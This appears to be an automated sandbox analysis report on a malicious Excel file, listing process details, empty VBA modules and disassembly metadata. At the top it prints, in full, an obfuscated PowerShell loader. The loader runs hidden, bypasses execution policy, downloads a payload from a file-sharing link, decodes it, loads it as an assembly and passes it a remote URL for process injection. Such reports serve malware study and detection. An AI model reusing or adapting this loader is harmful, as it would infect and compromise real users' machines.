                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                      Imagebase:0x13f480000
                                                                      File size:443'392 bytes
                                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:15
                                                                      Start time:01:28:23
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
                                                                      Imagebase:0x13f480000
                                                                      File size:443'392 bytes
                                                                      MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Call Graph

                                                                      • Entrypoint
                                                                      • Decryption Function
                                                                      • Executed
                                                                      • Not Executed
                                                                      • Show Help
                                                                      callgraph 1 Error: Graph is empty

                                                                      Module: Sheet1

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Sheet1"

                                                                      2

                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Module: Sheet2

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Sheet2"

                                                                      2

                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Module: Sheet3

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Sheet3"

                                                                      2

                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Module: ThisWorkbook

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "ThisWorkbook"

                                                                      2

                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = False

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Function 036A0FC1 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000003.499299609.00000000036A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_3_36a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction ID: b3a0049e715de6ef79278372baf95320101fa6f3c77245049a35121cc4cc724f
                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 036A0FA9 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000003.499299609.00000000036A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_3_36a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction ID: b3a0049e715de6ef79278372baf95320101fa6f3c77245049a35121cc4cc724f
                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 036A0FB9 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000003.499299609.00000000036A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_3_36a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction ID: b3a0049e715de6ef79278372baf95320101fa6f3c77245049a35121cc4cc724f
                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 036A0FB1 Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000003.499299609.00000000036A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_3_36a0000_mshta.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction ID: b3a0049e715de6ef79278372baf95320101fa6f3c77245049a35121cc4cc724f
                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                        • Instruction Fuzzy Hash:

                                                                        Execution Graph

                                                                        Execution Coverage:4.4%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:4
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 3636 7fe89997c25 3637 7fe89997c33 3636->3637 3638 7fe89997bd3 URLDownloadToFileW 3637->3638 3639 7fe89997c00 3637->3639 3638->3639

                                                                        Executed Functions

                                                                        Function 000007FE89997018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529296081.000007FE89990000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89990000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89990000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: DownloadFile
                                                                        • String ID:
                                                                        • API String ID: 1407266417-0
                                                                        • Opcode ID: 879728d0cbfe6da573771bdd2793b6597b1a3b7e0c93513666902692d11056d7
                                                                        • Instruction ID: 0fad5e4383d5fdc216e536ed09c79d309fae6a9213bcf8d9fa7efc9228c376e9
                                                                        • Opcode Fuzzy Hash: 879728d0cbfe6da573771bdd2793b6597b1a3b7e0c93513666902692d11056d7
                                                                        • Instruction Fuzzy Hash: 9E319F31918A5C9FDB58EF5CD885BA9B7E1FB59321F00822ED05ED3661DB70B8068B81
                                                                        Function 000007FE89A6566D Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529358494.000007FE89A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89a60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: V
                                                                        • API String ID: 0-1342839628
                                                                        • Opcode ID: 9d60b80d690f96ad654d1a059c9020c3a9a1f26ec69a460323e402779ee46eb9
                                                                        • Instruction ID: 05df26ce201530af25db1e1b0d1f65da217640749fc4eda23d6bf8aebda8e676
                                                                        • Opcode Fuzzy Hash: 9d60b80d690f96ad654d1a059c9020c3a9a1f26ec69a460323e402779ee46eb9
                                                                        • Instruction Fuzzy Hash: 7BD1E23180E7C91FD35797389C146A67FA4EF87260F0911EBD48DCB0A3D619AD5AC3A2
                                                                        Function 000007FE89997AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529296081.000007FE89990000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89990000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89990000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID: DownloadFile
                                                                        • String ID:
                                                                        • API String ID: 1407266417-0
                                                                        • Opcode ID: 3b2b4d0d41b9374ce89ee182d845af46cba2b3cbd07fee8e43d11a0effa7f86f
                                                                        • Instruction ID: 6f84947ac8fb5dc9d1977e392bb3539af670bb67ee2fccd97c34dfdfbf57d55f
                                                                        • Opcode Fuzzy Hash: 3b2b4d0d41b9374ce89ee182d845af46cba2b3cbd07fee8e43d11a0effa7f86f
                                                                        • Instruction Fuzzy Hash: F241F57080DB889FDB1ADB589C447AABBF0FB56321F04426FD089D3562DB646806C781
                                                                        Function 000007FE89997C25 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529296081.000007FE89990000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89990000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89990000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0c8657eb1866d3a09ed82ca6a6449d5af164c905957afd564dde86f89b2c60c8
                                                                        • Instruction ID: 5a879a4bd43039927ec1e1a18b5e38d8993ef72d526dbbe0c02b5738259c278d
                                                                        • Opcode Fuzzy Hash: 0c8657eb1866d3a09ed82ca6a6449d5af164c905957afd564dde86f89b2c60c8
                                                                        • Instruction Fuzzy Hash: 0721C12191D3D14FE716AB68AC512E87FA0EF03324F0842E7C099870F3D629745AC796
                                                                        Function 000007FE89A68549 Relevance: .7, Instructions: 709COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 96 7fe89a68549-7fe89a685f9 97 7fe89a685ff-7fe89a68609 96->97 98 7fe89a68add-7fe89a68b96 96->98 99 7fe89a68622-7fe89a68629 97->99 100 7fe89a6860b-7fe89a68618 97->100 102 7fe89a68640 99->102 103 7fe89a6862b-7fe89a6863e 99->103 100->99 101 7fe89a6861a-7fe89a68620 100->101 101->99 105 7fe89a68642-7fe89a68644 102->105 103->105 107 7fe89a6864a-7fe89a68656 105->107 108 7fe89a68a58-7fe89a68a62 105->108 107->98 112 7fe89a6865c-7fe89a68666 107->112 110 7fe89a68a75-7fe89a68a85 108->110 111 7fe89a68a64-7fe89a68a74 108->111 114 7fe89a68a92-7fe89a68adc 110->114 115 7fe89a68a87-7fe89a68a8b 110->115 116 7fe89a68682-7fe89a68692 112->116 117 7fe89a68668-7fe89a68675 112->117 115->114 116->108 122 7fe89a68698-7fe89a686cc 116->122 117->116 118 7fe89a68677-7fe89a68680 117->118 118->116 122->108 128 7fe89a686d2-7fe89a686de 122->128 128->98 129 7fe89a686e4-7fe89a686ee 128->129 130 7fe89a686f0-7fe89a686fd 129->130 131 7fe89a68707-7fe89a6870c 129->131 130->131 132 7fe89a686ff-7fe89a68705 130->132 131->108 133 7fe89a68712-7fe89a68717 131->133 132->131 133->108 134 7fe89a6871d-7fe89a68722 133->134 134->108 136 7fe89a68728-7fe89a68737 134->136 137 7fe89a68739-7fe89a68743 136->137 138 7fe89a68747 136->138 139 7fe89a68745 137->139 140 7fe89a68763-7fe89a687ee 137->140 141 7fe89a6874c-7fe89a68759 138->141 139->141 148 7fe89a68802-7fe89a68824 140->148 149 7fe89a687f0-7fe89a687fb 140->149 141->140 142 7fe89a6875b-7fe89a68761 141->142 142->140 150 7fe89a68834 148->150 151 7fe89a68826-7fe89a68830 148->151 149->148 154 7fe89a68839-7fe89a68846 150->154 152 7fe89a68832 151->152 153 7fe89a68850-7fe89a688de 151->153 152->154 161 7fe89a688f2-7fe89a68910 153->161 162 7fe89a688e0-7fe89a688eb 153->162 154->153 155 7fe89a68848-7fe89a6884e 154->155 155->153 163 7fe89a68912-7fe89a6891c 161->163 164 7fe89a68920 161->164 162->161 165 7fe89a6891e 163->165 166 7fe89a6893d-7fe89a689cd 163->166 167 7fe89a68925-7fe89a68933 164->167 165->167 174 7fe89a689e1-7fe89a68a3a 166->174 175 7fe89a689cf-7fe89a689da 166->175 167->166 169 7fe89a68935-7fe89a6893b 167->169 169->166 178 7fe89a68a42-7fe89a68a57 174->178 175->174
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529358494.000007FE89A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89a60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f2fed76b0151ac51bf29aa5920ef76140304c54ca6a72d988561f4774ec8a21f
                                                                        • Instruction ID: 4ce5c59cdd6a77146d9154ee0e02586260b23b43e36a01b6b904a211e63cb220
                                                                        • Opcode Fuzzy Hash: f2fed76b0151ac51bf29aa5920ef76140304c54ca6a72d988561f4774ec8a21f
                                                                        • Instruction Fuzzy Hash: AF22E43090CB894FE79ADB2C84516697FE2FF9A344F2401EED48EC72A3DA25AC55C741
                                                                        Function 000007FE89A64165 Relevance: .4, Instructions: 432COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 179 7fe89a64165-7fe89a641f4 180 7fe89a641fa-7fe89a64204 179->180 181 7fe89a64457-7fe89a64516 179->181 182 7fe89a6421d-7fe89a64222 180->182 183 7fe89a64206-7fe89a64213 180->183 185 7fe89a643fb-7fe89a64405 182->185 186 7fe89a64228-7fe89a6422b 182->186 183->182 187 7fe89a64215-7fe89a6421b 183->187 190 7fe89a64414-7fe89a64424 185->190 191 7fe89a64407-7fe89a64413 185->191 188 7fe89a64242 186->188 189 7fe89a6422d-7fe89a64240 186->189 187->182 194 7fe89a64244-7fe89a64246 188->194 189->194 195 7fe89a64431-7fe89a64454 190->195 196 7fe89a64426-7fe89a6442a 190->196 194->185 197 7fe89a6424c-7fe89a64280 194->197 195->181 196->195 204 7fe89a64282-7fe89a64295 197->204 205 7fe89a64297 197->205 206 7fe89a64299-7fe89a6429b 204->206 205->206 206->185 208 7fe89a642a1-7fe89a642a9 206->208 208->181 209 7fe89a642af-7fe89a642b9 208->209 210 7fe89a642d5-7fe89a642e5 209->210 211 7fe89a642bb-7fe89a642c8 209->211 210->185 215 7fe89a642eb-7fe89a6431c 210->215 211->210 212 7fe89a642ca-7fe89a642d3 211->212 212->210 215->185 218 7fe89a64322-7fe89a6434e 215->218 220 7fe89a64374 218->220 221 7fe89a64350-7fe89a64372 218->221 222 7fe89a64376-7fe89a64378 220->222 221->222 222->185 224 7fe89a6437e-7fe89a64386 222->224 225 7fe89a64388-7fe89a64392 224->225 226 7fe89a64396 224->226 228 7fe89a64394 225->228 229 7fe89a643b2-7fe89a643e1 225->229 230 7fe89a6439b-7fe89a643a8 226->230 228->230 233 7fe89a643e8-7fe89a643fa 229->233 230->229 232 7fe89a643aa-7fe89a643b0 230->232 232->229
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529358494.000007FE89A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89a60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aefbb00e8f3f3c6292156400e7466aeabecc919fb728bc94672263213a918f42
                                                                        • Instruction ID: a4ec02ffcfad39b46a565880a7ccc487bbf919dd3631440fc547f11f6ed7f587
                                                                        • Opcode Fuzzy Hash: aefbb00e8f3f3c6292156400e7466aeabecc919fb728bc94672263213a918f42
                                                                        • Instruction Fuzzy Hash: 10C1372091DBCA0FE74BA76C54546BA7FE1EF46744F1801EAD48ECB1A3C618AC56C361
                                                                        Function 000007FE89A60F0D Relevance: .3, Instructions: 346COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 235 7fe89a60f0d-7fe89a60f96 237 7fe89a60f9c-7fe89a60fa6 235->237 238 7fe89a61098-7fe89a610dc 235->238 239 7fe89a60fbf-7fe89a60fee 237->239 240 7fe89a60fa8-7fe89a60fb5 237->240 245 7fe89a610de-7fe89a610e7 238->245 246 7fe89a610ed-7fe89a61124 238->246 239->238 251 7fe89a60ff4-7fe89a60ffe 239->251 240->239 242 7fe89a60fb7-7fe89a60fbd 240->242 242->239 245->246 249 7fe89a611c1-7fe89a611cb 246->249 250 7fe89a6112a-7fe89a6119e 246->250 252 7fe89a611cd-7fe89a611d7 249->252 253 7fe89a611d8-7fe89a611e8 249->253 269 7fe89a611a6-7fe89a611be 250->269 254 7fe89a61000-7fe89a6100d 251->254 255 7fe89a61017-7fe89a61077 251->255 256 7fe89a611f5-7fe89a6121a 253->256 257 7fe89a611ea-7fe89a611ee 253->257 254->255 259 7fe89a6100f-7fe89a61015 254->259 266 7fe89a6108b-7fe89a61097 255->266 267 7fe89a61079-7fe89a61084 255->267 257->256 259->255 267->266 269->249
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529358494.000007FE89A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89a60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be62eb5e809b78a2b2271789150396114ec14a468d8428157dd36a2bc8d66003
                                                                        • Instruction ID: 2456561a9d1bfa6403fe793996c1d997e143efc02beffe31fcdabfe49f07b54b
                                                                        • Opcode Fuzzy Hash: be62eb5e809b78a2b2271789150396114ec14a468d8428157dd36a2bc8d66003
                                                                        • Instruction Fuzzy Hash: B2A1E420A0DBC90FE757977C58646607FE1EF47254B2A41EBC48ECB1B3DA189C5AC352

                                                                        Non-executed Functions

                                                                        Function 000007FE89A6352E Relevance: .3, Instructions: 334COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.529358494.000007FE89A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7fe89a60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bb2fcbe96feb007ed5a4934c944683aabf862acc2c2ccf86d4d6b7917ef71725
                                                                        • Instruction ID: 0ccaaca25dd0fa9003ab09b31d65c51e052a6417d3d17b2cc8deb17d908e4981
                                                                        • Opcode Fuzzy Hash: bb2fcbe96feb007ed5a4934c944683aabf862acc2c2ccf86d4d6b7917ef71725
                                                                        • Instruction Fuzzy Hash: D1A1352080EBC90FD747A77898142A63FF1EF4B254F1901EBD48DCB1A3DA199D1AC362

                                                                        Executed Functions

                                                                        Function 000007FE89A97FC6 Relevance: .4, Instructions: 413COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8102f3be21c2518df007a80bd1a81ea6accab84265a289ebd35f9438c4437e47
                                                                        • Instruction ID: f7ace723bba891f6e16c7aee356db02deead69a952ca8492167af6e952c11e72
                                                                        • Opcode Fuzzy Hash: 8102f3be21c2518df007a80bd1a81ea6accab84265a289ebd35f9438c4437e47
                                                                        • Instruction Fuzzy Hash: D2D1233190DBC94FEB96A73C88646A57FE1FF5A254F1901EBD08DC71A3C629AC09C352
                                                                        Function 000007FE89A9A2F2 Relevance: 3.4, Strings: 2, Instructions: 866COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.537617240.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_7fe89a90000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: XhT$XhT
                                                                        • API String ID: 0-3828503999
                                                                        • Opcode ID: 7805a61cb1a5843f86e3e94bd0042b58b6054322d7e4017538a708b88845edf4
                                                                        • Instruction ID: 236af1201ecb0b1ff94622d176cd98d0271becdc121f8464547650e894501680
                                                                        • Opcode Fuzzy Hash: 7805a61cb1a5843f86e3e94bd0042b58b6054322d7e4017538a708b88845edf4
                                                                        • Instruction Fuzzy Hash: 5552F930A0CA8D4FE74AEB6C84547697FE2FF5A344F2401EAD04EC72A3DA25AC56C751
